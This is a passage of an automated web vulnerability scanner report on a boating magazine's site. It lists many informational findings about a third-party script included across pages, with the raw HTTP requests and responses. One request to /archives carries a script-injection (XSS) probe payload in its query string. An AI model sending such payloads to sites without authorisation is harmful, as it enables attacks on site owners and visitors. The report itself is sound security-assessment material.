Path:	/about-us

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /about-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1260. http://www.soundingsonline.com/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/advertise

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /advertise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

21.1261. http://www.soundingsonline.com/archives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

21.1262. http://www.soundingsonline.com/boat-shop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1263. http://www.soundingsonline.com/boat-shop/know-how previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/know-how

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/know-how HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1264. http://www.soundingsonline.com/boat-shop/new-boats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-boats

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/new-boats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1265. http://www.soundingsonline.com/boat-shop/new-gear previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-gear

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/new-gear HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1266. http://www.soundingsonline.com/boat-shop/on-powerboats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-powerboats

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/on-powerboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1267. http://www.soundingsonline.com/boat-shop/on-sailboats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-sailboats

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/on-sailboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1268. http://www.soundingsonline.com/boat-shop/q-a-a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/q-a-a

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/q-a-a HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1269. http://www.soundingsonline.com/boat-shop/sea-savvy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/sea-savvy

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/sea-savvy HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1270. http://www.soundingsonline.com/boat-shop/tech-talk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/tech-talk

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/tech-talk HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1271. http://www.soundingsonline.com/boat-shop/used-boat-review previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/used-boat-review

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/used-boat-review HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1272. http://www.soundingsonline.com/calendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/calendar

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /calendar HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1273. http://www.soundingsonline.com/career-opportunities previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/career-opportunities

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /career-opportunities HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1274. http://www.soundingsonline.com/columns-blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1275. http://www.soundingsonline.com/columns-blogs/bay-tripper previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/bay-tripper

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/bay-tripper HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

